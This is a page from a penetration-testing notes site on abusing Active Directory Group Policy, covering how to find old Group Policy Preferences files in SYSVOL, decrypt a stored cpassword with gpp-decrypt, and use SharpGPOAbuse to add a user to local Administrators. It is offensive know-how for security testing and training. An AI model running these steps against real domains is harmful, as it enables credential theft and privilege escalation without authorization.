SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Domain Privesc #Group Policies

Group Policies (GPO)

It is always a good idea to check SYSVOL domain shares (they are available by default). By default, the SYSVOL folder is mapped to %SystemRoot%\SYSVOL\Sysvol\<domain_name> on the domain controller and every domain user has access to it.

There might be interesting domain policies or old backup policies readable in shares like \\<machine>\sysvol\<domain>\Policies\. Old policies are common artifacts on domain shares as system administrators often forget them when implementing new policies. Old policies might be helpful for learning more about the current policies.

GPP Password

The XML file with old policies might include encrypted passwords. Historically, system administrators often changed local workstation passwords through Group Policy Preferences (GPP). However, even though GPP-stored passwords are encrypted with AES-256, the private key for the encryption has been posted on MSDN so it's already compromised.

Interesting line within XML file might look like this: cpassword="+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

Kali:

# Decrypt GPP password
gpp-decrypt $encrypted_password

GPO Abuse

In a situation where an ordinary domain user has broad permissions (e.g. GenericWrite) on a GPO that affects, for example, a Domain Admins group or other valuable object we are able to abuse that GPO using SharpGPOAbuse.exe.

NOTE: This type of misconfiguration can be detected by BloodHound or scripts like PowerView.

Windows (example usage):

# Abuse GPO (Add User to local Administrators)
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount $user --GPOName $gpo
 
# Update policies
gpupdate /force
 
# It might be necessary to logout and logon once again

Children

Group Policies